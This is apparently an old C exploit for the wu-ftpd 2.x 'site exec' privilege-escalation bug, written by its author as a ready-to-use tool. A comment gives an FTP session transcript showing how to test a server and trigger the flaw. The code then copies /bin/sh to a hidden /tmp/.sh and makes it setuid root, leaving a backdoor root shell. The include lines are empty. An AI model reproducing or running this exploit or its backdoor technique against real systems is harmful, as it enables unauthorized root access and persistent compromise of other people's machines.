/* Explot wu-ftp 2.x (site exec bug) You need to have an account on the system running wu-ftpd Compile this program in yer dir: cc -o ftpbug ftpbug.c Login to the system: 220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready. Name (exploitablesys:root): goodaccount 331 Password required for goodaccount. Password: (password) 230 User goodaccount logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> quote "site exec bash -c id" (see if sys is exploitable) 200-bash -c id 200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users) 200 (end of 'bash -c id') ftp> quote "site exec bash -c /yer/home/dir/ftpbug" 200-bash -c /yer/home/dir/ftpbug 200 (end of 'bash -c /yer/home/dir/ftpbug') ftp> quit 221 Goodbye. Now you have a suid root shell in /tmp/.sh Have fun StaTiC (statik@free.org) */ #include #include #include main() { seteuid(0); system("cp /bin/sh /tmp/.sh"); system("chmod 6777 /tmp/.sh"); }